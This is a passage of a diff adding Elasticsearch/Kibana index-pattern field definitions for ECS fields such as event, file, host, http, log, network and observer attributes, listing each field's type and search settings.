"event.action", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.category", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.created", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.dataset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.duration", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.end", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.ingested", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.kind", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.module", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.original", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.outcome", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.provider", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "event.risk_score", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "event.risk_score_norm", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.sequence", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.start", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.timezone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.url", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "file.accessed", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.attributes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "file.code_signature.exists", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.code_signature.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.code_signature.subject_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "file.code_signature.trusted", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "file.code_signature.valid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "file.created", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "file.ctime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.device", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.directory", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.drive_letter", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.extension", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.gid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.group", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.inode", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.mime_type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.mode", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "file.mtime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.owner", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "file.path.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "file.path" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.pe.company", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.pe.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.pe.file_version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.pe.original_file_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.pe.product", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "file.size", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.target_path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "file.target_path.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "file.target_path" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.uid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.architecture", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "host.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.hostname", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "host.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.family", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.os.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.os.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.kernel", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.os.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.os.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.platform", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "host.uptime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "http.request.body.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "http.request.body.content", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "http.request.body.content.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "http.request.body.content" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "http.request.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "http.request.method", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "http.request.referrer", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "http.response.body.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "http.response.body.content", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "http.response.body.content.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "http.response.body.content" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "http.response.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "http.response.status_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "http.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "interface.alias", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "interface.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "interface.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.level", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.logger", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "integer" + ], + "name": "log.origin.file.line", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.origin.file.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.origin.function", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.original", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.facility.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.syslog.facility.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.priority", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.severity.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.syslog.severity.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.application", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "network.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.community_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.direction", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "network.forwarded_ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.iana_number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.inner.vlan.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.inner.vlan.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "network.packets", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.protocol", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.transport", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.vlan.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "network.vlan.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.interface.alias", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.interface.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.interface.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.vlan.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.vlan.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.egress.zone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "observer.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.hostname", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.ingress.interface.alias", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": 